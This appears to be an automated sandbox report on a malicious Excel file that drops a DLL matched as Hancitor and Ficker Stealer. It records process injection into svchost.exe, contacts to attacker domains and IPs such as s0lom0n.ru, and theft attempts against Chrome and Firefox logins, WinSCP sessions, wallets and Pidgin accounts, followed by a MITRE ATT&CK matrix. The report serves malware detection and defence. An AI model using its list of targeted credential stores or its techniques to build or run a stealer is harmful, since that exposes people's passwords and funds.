                  Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: s0lom0n.ru
                  Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 95.213.179.67 80
                  Contains functionality to inject threads in other processes
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00343880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle | 5_2_00343880
                  Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                  Source: rundll32.exe, 00000004.00000002.2348564592.0000000000720000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349126393.0000000000D30000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                  Source: rundll32.exe, 00000004.00000002.2348564592.0000000000720000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349126393.0000000000D30000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: rundll32.exe, 00000004.00000002.2348564592.0000000000720000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349126393.0000000000D30000.00000002.00000001.sdmp | Binary or memory string: !Progman
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00356240 cpuid | 5_2_00356240
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA | 5_2_00355E13
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW | 7_2_00415800
                  Source: C:\Windows\SysWOW64\svchost.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\Documents VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0034BDA0 GetSystemTimeAsFileTime,__aulldiv | 5_2_0034BDA0
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0035073E __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,__invoke_watson,__invoke_watson | 5_2_0035073E
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00341AA0 GetVersion,wsprintfA,wsprintfA | 5_2_00341AA0
                  Source: C:\Windows\SysWOW64\svchost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information:

                  Yara detected Ficker Stealer
                  Source: Yara match | File source: 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: svchost.exe PID: 2292, type: MEMORY
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.json
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

                  Remote Access Functionality:

                  Yara detected Ficker Stealer
                  Source: Yara match | File source: 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: svchost.exe PID: 2292, type: MEMORY
                  Yara detected Hancitor
                  Source: Yara match | File source: 5.3.rundll32.exe.1d438c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.3.rundll32.exe.1d438c.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2364, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  Valid Accounts | Scripting 32 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | OS Credential Dumping 1 | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 13 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                  Default Accounts | Native API 3 | Boot or Logon Initialization Scripts | Process Injection 212 | Deobfuscate/Decode Files or Information 1 | Credentials in Registry 2 | File and Directory Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                  Domain Accounts | Exploitation for Client Execution 33 | Logon Script (Windows) | Logon Script (Windows) | Scripting 32 | Credentials In Files 1 | System Information Discovery 46 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                  Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Security Software Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap | | Carrier Billing Fraud
                  Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Virtualization/Sandbox Evasion 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                  Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | Process Discovery 3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                  External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 1 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                  Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 1 | Proc Filesystem | System Network Configuration Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                  Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 212 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                  Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Rundll32 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

                  Behavior Graph

                  [Figure: behavior graph. Behavior Graph ID: 452590; Sample: 0722_2857746751.xls; Startdate: 22/07/2021; Architecture: WINDOWS; Score: 100.
                  Process tree: EXCEL.EXE dropped C:\Users\user\AppData\Local\Temp\532.dll (PE32) and started rundll32.exe and imjppdmg.exe; rundll32.exe started a second rundll32.exe, which started svchost.exe.
                  DNS/IP nodes: the second rundll32.exe contacted tholeferli.com (194.147.115.74) and s0lom0n.ru (8.211.241.0) plus 3 other IPs or domains; svchost.exe contacted pospvisis.com (95.213.179.67) and 50.16.239.65 plus 3 other IPs or domains.]
